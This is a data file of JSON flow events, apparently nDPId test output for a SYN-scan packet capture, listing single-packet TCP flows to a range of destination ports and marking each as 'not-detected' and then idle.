-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
